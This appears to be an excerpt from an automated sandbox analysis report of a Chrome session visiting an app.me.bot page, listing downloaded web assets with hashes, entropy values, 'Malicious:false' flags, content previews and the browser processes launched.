                                      Preview:2:I[66513,[],"ClientPageRoot"].3:I[84778,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","5189","static/chunks/app/(layout)/(PALayout)/memory/detail/page-8b4f18c2e436e066.js"],"default",1].4:I[39275,[],""].5:I[61343,[],""].6:I[13165,["8252","static/chunks/4b1a69f1-da174b537a3b105c.js","7487","static/chunks/49a1bf4b-d76374957333b5fc.js","595","static/chunks/595-09c9610e33be8fcc.js","5681","static/chunks/5681-43d82f1a3d805e0d.js","3122","static/chunks/3122-1f6938ed37fcf02d.js","4653","static/chunks/4653-73048479d8c69d09.js","6219","static/chunks/6219-1457be36132bf9c6.js","1073","static/chunks/1073-e4f77f384144a1c4.js","9818","static/chunks/9818-2cef5ca4ed1a1e3a.js","6701","static/chunks/6701-3887d30af462f285.js","9578","static/chunks/9578-a4316cb78831d4a3.js","4059","static/chunks/4059-ff6b23f1a12feb76.js","1025","static/chunks/1025-e8953ee90888594c.js","4595","static/chunks/4595-19c1c19690f67e9a.js","3927","static/chunks/3927-bc012ff258351a6d.js","4871","static/chunks/4871-53f67f62
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                      Category:downloaded
                                      Size (bytes):174041
                                      Entropy (8bit):5.35086933141438
                                      Encrypted:false
                                      SSDEEP:3072:oYGRyCLfF0pHHlASR+YWKi5EFhZZ9Or15+/KtM:oYU7fF0xHD+YWK+EdZ9aygM
                                      MD5:24F346595F7A9FFFD0DDF65509171244
                                      SHA1:C11555D65B5A7F9DCBC6B7C2901989C2BAF1DDB3
                                      SHA-256:0CB607ABCB4E929E713556F819AA1D43627E48EFC6B7D920178799E4102DD1C4
                                      SHA-512:73805CF28D51ADAC9D23D34D5F713FD198A45ABF6A2B71106DBFEE4685D3D98282F10A988786ED08A9B6581025BDE9F6F129D8DAC7F127FF76B06388545CE59D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/3927-bc012ff258351a6d.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3927],{81793:function(e,n,t){"use strict";t.d(n,{default:function(){return n1}});var o=t(62737),r=t.n(o),a=t(67638),c=t(35608),i=t.n(c),l=t(42554),u=t.n(l),s=t(81454),d=t.n(s),f=t(8376),p=t.n(f),m=t(74753),v=t.n(m),g=t(7905),h=t.n(g);r().extend(h()),r().extend(v()),r().extend(i()),r().extend(u()),r().extend(d()),r().extend(p()),r().extend(function(e,n){var t=n.prototype,o=t.format;t.format=function(e){var n=(e||"").replace("Wo","wo");return o.bind(this)(n)}});var b={bn_BD:"bn-bd",by_BY:"be",en_GB:"en-gb",en_US:"en",fr_BE:"fr",fr_CA:"fr-ca",hy_AM:"hy-am",kmr_IQ:"ku",nl_BE:"nl-be",pt_BR:"pt-br",zh_CN:"zh-cn",zh_HK:"zh-hk",zh_TW:"zh-tw"},w=function(e){return b[e]||e.split("_")[0]},y=function(){(0,a.ET)(!1,"Not match any format. Please help to fire a issue about this.")},C=t(4438),S=t(2265),x=t(22988),E={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M880 184H712v-64c0-4.4-3.6-8-8-8h
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.924771426480989
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiRE9yqXXl6EnSJFPXn:UrXiLqX1GX
                                      MD5:D28D93248C8D3F989BFE3D2B4C03C753
                                      SHA1:49C469B00EB84AF50EEA276060AE224B63AA8629
                                      SHA-256:B92C0C639F1720441D120CDC0071293916DEE7E643002BB01FD1858FF06B9A79
                                      SHA-512:B70E945890D20385F8B55713836382A7E3909D2421BD1CA3F18E22CAC1FED01D1A98663980214D79FE5A52A49312D9F1D8D0FDE37A54B1C3AAE1C53184D38E4B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__3
                                      Preview:/**/ typeof branch_callback__3 === 'function' && branch_callback__3("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.947846871207472
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREOP1yqXXl6EpIW3FPXn:UrXid4qX1FlX
                                      MD5:050E070DDEDCFB3CB9660B9D7B1776DA
                                      SHA1:046CAE605D395FF985CD6C2868B565BDA5A256EA
                                      SHA-256:97300AF124088A1D5173104E225980A86692C84170DC08FFAD7C37FA8510FE7B
                                      SHA-512:6D8D0A384225D28636021A87E6FBC2CB72120581927EF1917BA1DD27D33EA454F0E8D44206EEAE7E727A01459E629FD5F0FC596C6CF45EACCF5786CDC6E3D0AE
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__2
                                      Preview:/**/ typeof branch_callback__2 === 'function' && branch_callback__2("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1567), with no line terminators
                                      Category:downloaded
                                      Size (bytes):1567
                                      Entropy (8bit):5.127596947624532
                                      Encrypted:false
                                      SSDEEP:24:+vOVEqLVSvntIVuReOU4aYmeivj4syed+eOcdk5cD+OY:+vyE+VSvtUuRVU4Ob74Nc+cD1Y
                                      MD5:E0189D7774632D6A7C0B5F71A54457AF
                                      SHA1:9EC4515284931E308CAD3420185678032696B92F
                                      SHA-256:6A1F8DED0BBEA760430F07DF3AC2A92CFBCD761AFB68AFA039C6E35638BE19B9
                                      SHA-512:4C70AC1F2A6E20CC4D784E4FEDC0E77D09DCB412C4078C1F018E7C52B6610A28D488874C4C8436E3B84FD13A10E0B21C5B8F717FD16C197BCB31D7CA0E9680AE
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css
                                      Preview:.index_headerContainer__BTFFv{display:flex;align-items:center;height:28px;padding:12px 20px;color:#160a0a;font-weight:500;font-size:16px;line-height:28px;background-color:#fefdff;border-radius:16px 16px 0 0}.index_headerContainer__BTFFv .index_icon__dGJ3u{width:16px;height:16px;margin-right:8px;border-radius:2px}.index_bodyContainer__rWyAt{box-sizing:border-box;max-height:467px;padding:16px 20px;overflow-y:scroll;border-radius:0 0 16px 16px}.index_bodyContainer__rWyAt::-webkit-scrollbar{display:none}.index_nullFooter__yadxv{max-height:539px}.index_emptyFooter__27lbp{max-height:499px}.index_large__IvaWh{height:499px}.index_textNormal__VhWSm{height:288px}.index_extraLarge__omkGP{height:calc(100vh - 200px)!important;max-height:unset!important}.index_root__6h0RH .ant-modal-mask{background-color:rgba(0,0,0,.6)}.index_modal__Pz0t5 .ant-modal{width:644px}.index_modal__Pz0t5 .ant-modal-content{padding:0;border-radius:20px}.index_modal__Pz0t5 .ant-modal-content .ant-modal-close{top:12px;right:1
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text
                                      Category:downloaded
                                      Size (bytes):19
                                      Entropy (8bit):3.6818808028034042
                                      Encrypted:false
                                      SSDEEP:3:VQRWN:VQRWN
                                      MD5:9FAE2B6737B98261777262B14B586F28
                                      SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                      SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                      SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.google.com/async/ddljson?async=ntp:2
                                      Preview:)]}'.{"ddljson":{}}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.947846871207472
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREpEyqXXl6EA2FPXn:UrXiglqX1VX
                                      MD5:A13DB20E093F3BC38FD835720D908A8F
                                      SHA1:C557613765CCB7FAF5A8F85C165F3F854A181258
                                      SHA-256:F326BCC5C980D505D3D2AA70EE09CEAF6407E5EB376B14C3ECE7C583E2B37B2F
                                      SHA-512:98722BC1B4DDA73D0441652C504CC034902A3F0F72BC155F23982A0D4A7A4FD2955EBAA554E7ECD244A87E79D77C7BA4904FF9B49AAB2F1D7F5B0BD8ADFB4693
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__0
                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):16668214
                                      Entropy (8bit):7.921533212250572
                                      Encrypted:false
                                      SSDEEP:393216:V1KiM6AFN9/k9/1duD4DUDwNLrffDf/f/fE:vKiM6ONSMA0wNLrn7HHE
                                      MD5:C78C42AA55544D438ACE3062BB3F5237
                                      SHA1:C3BC4B74806F5D0689AEDCE929988302856E1511
                                      SHA-256:DD88E00FE04E2A572998E74B1FE084A319D391F2852D13183B70147FBD78D977
                                      SHA-512:E3FD103005F4487ADF67446041652142B08D22AF3DF4CB70F29598C7C21AA008338F980E2D97C52949EC1C34D315E10EB63E8FE1E70A2B7F4DBFC141DDF8529F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736845050141/gif-1.gif
                                      Preview:GIF89a...........eoN....k.hUm]L...XR/:D,.....R..NXL..l..e..U.N...R3GC..w.n2..]0.Y.}W.y^...T2..>.z&.T..^3..O....3.v.vM}F$...........e....p..w...................f....jF............jM....`E..x....y..^.........+1*...eB..ke.?.x..{9..._pji.T.z^kso|.@.c...|..Oyj^...vH.Q....~Un9.._.i...x.N........h...x..d..J.x.g.......V..Q..a..!.....j.........g.hy}[.i..{@...........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:ADA50707CA7611EF94A5E80A6F57A235" xmpMM:DocumentID="xmp.did:ADA50708CA7611EF94A5E80A6F57A235"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):205
                                      Entropy (8bit):4.9973639911175765
                                      Encrypted:false
                                      SSDEEP:3:GPlEM0Xz+gLRMTFEylWoKJQIe4W5UjW5UmJEseB8GlLPCUYmKIoAAAX2FHAXWIQA:G9EMgATFUXXAxLJEsNGCUpKalmxAGgHZ
                                      MD5:45405DE65F392717BB1E340EB08FAEC2
                                      SHA1:39064F46B00B70EB42DCF1291F6A0AB20C64CEF1
                                      SHA-256:5AE3C72560F9394E621700DEFF4F1599C129E06FCDA275D97B766DC9D732D2E0
                                      SHA-512:4514EED37B73B9E485265CF44076C3FA3CD0F7AC42BD9A03E64A2BAF964B710CA2888C7531EB68D57CE2A3BA9CDE19B7286AE779C039C27CA5DEC5C228CB1080
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/096e13a5235df507.css
                                      Preview:.index_container__pPMIZ{position:relative;display:flex;flex-direction:column;width:100%;height:100%;height:100dvh;overflow:hidden;background:linear-gradient(180deg,#f0e7db,#eee2de 32%,#e6e2ed 67%,#e1ebeb)}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (13686)
                                      Category:dropped
                                      Size (bytes):20571
                                      Entropy (8bit):5.3824972394626265
                                      Encrypted:false
                                      SSDEEP:192:wUZkuan5WNjbi23Gf1Buxpudi+97G9jEJ4ImmpgG:R6uW5WNjbi2WfnGpR+1G9IH/GG
                                      MD5:96988CD88CDF56ED6ABEC9F567FD1169
                                      SHA1:14B7E24D7C23B426F87285E9555F4385BB0ADE18
                                      SHA-256:F32EF3EFC726546C4AD8CDC535019601FA01FD115FAB6691D434A93892CDCF12
                                      SHA-512:F5D4164AF6DAA7057AD5CFA413B2CF2BEF1C610B144058E527D7709B9C7C0435E38143053A7C20BF98B0FA73D324F42B46657ACBD0A5B46A2A100D8C929D2097
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/webpack-01f8cf0da3922576.js"/><script src="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/fd9d1056-0ed4dcd63e61d9b6.js" async=""></script><script src="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7023-0a587941e37db9aa.js" async=""></script><script src="
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):937
                                      Entropy (8bit):7.737931820487441
                                      Encrypted:false
                                      SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                      MD5:FC3B7BBE7970F47579127561139060E2
                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://developers.cloudflare.com/favicon.png
                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):91
                                      Entropy (8bit):4.934164316286191
                                      Encrypted:false
                                      SSDEEP:3:Ub/HXiREy4MyqXXl6ETFPXn:UrXiZaqX1xX
                                      MD5:DA54904151DB79CD4FA63AB6469CF7F7
                                      SHA1:C39684F323DD21A9EED9AEF63CFC643530474BD5
                                      SHA-256:791F229332853B0DFE5DDC51AA4A09C04A9AA7017E5D0707DBA85C1F02C03AF1
                                      SHA-512:31ED1668FA84DE452638367B1ABB6C32EF2BF7D98B120E55D04DB585B208A780C0B156DDC49F7A813DD3A99C44DB68C8DC806DDF1361F4A0D950EDCF2F21E4B4
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1430591912343977668&branch_key=key_live_mEmJ6vCmCTCf3F0HkItErkhdsAmg6bf2&callback=branch_callback__4
                                      Preview:/**/ typeof branch_callback__4 === 'function' && branch_callback__4("1430591912343977668");
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):10813
                                      Entropy (8bit):7.8305096157244
                                      Encrypted:false
                                      SSDEEP:192:SsGAF8np15Ha+aPcLERxTm5zew/otwKK4wBYtgZiZkSCorM49Mp:SB/1Y+aP1LaewQzbwBYtUd/or/9w
                                      MD5:CF205D8B6FAE21604FFB4A74A1F6C1B6
                                      SHA1:E4E53E4A7B4529D1A339482D2B2B64270F042958
                                      SHA-256:D6D1E0344FE039B196DB10EC30B7944B5BDDBF8B039866A33176AF87100BB6E8
                                      SHA-512:CE8B354362DCBCA5BFA2E409C87C62FD8F4DF78C26A281697CE68706126D67B38E0AAD00CB2ACD6801E0282EE88CD61F6463128D04CCB0160FF8E4AF8E28135F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/mebot_logo.png
                                      Preview:.PNG........IHDR...X...X......f......sRGB.........sBIT....|.d... .IDATx...O.].....`d3....4........loh......"..y.....FY...".[2o..Hl...h2......`..d.b..4..l.`.h_..v....:U..l..nW...o~U.N.............................................................................................................................................^.....}....?:......==...#.^P..b........g............$.h..@....g.....Fu{.....P.g.E`..j<...~l5....5.Q..c.!&.A`1......A@.%[.....^.C`...cJH......WC.]lN`q. ....8z..I..b@`U..g..B..^I...B...........*....Z..J.n..*.4.VM.V.}v.......U..U(a..}.~xu.{..^......+.......B.+...:,....JX.....B...+c.V.%.Z9.X..V..p>+O.+#...V.Y..X..W..f.C`u...`-......W.l.4...VG}...w]....L..J`u.......o..Y.2.z...W.L..y..g.^..L.:B\.0.......N...Vr.>.x...........X........@y..J...DV......X9...|.u.J`%...mp.=.[.-.W......X-.W.."..%.Z"..HMd.G`.@\..."....a.....Y..X..W.t..j..j.KD..:......q.@.......... 7"+>7.G...f.....VD.~~...........{.N\.+..?....<.z.....3X.8w.@)<Y........4w?.W.L.......4+g
                                      No static file info
                                      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.
                                      050100s020406080100

                                      Click to jump to process

                                      050100s0.0050100150200250MB

                                      Click to jump to process

                                      Target ID:0
                                      Start time:13:11:01
                                      Start date:18/03/2025
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                      Imagebase:0x7ff643280000
                                      File size:3'388'000 bytes
                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:1
                                      Start time:13:11:02
                                      Start date:18/03/2025
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,10452714066869068350,9295552649524897130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3
                                      Imagebase:0x7ff643280000
                                      File size:3'388'000 bytes
                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:2
                                      Start time:13:11:03
                                      Start date:18/03/2025
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.me.bot/public/WQVPRYIAILRRZCLB"
                                      Imagebase:0x7ff643280000
                                      File size:3'388'000 bytes
                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      No disassembly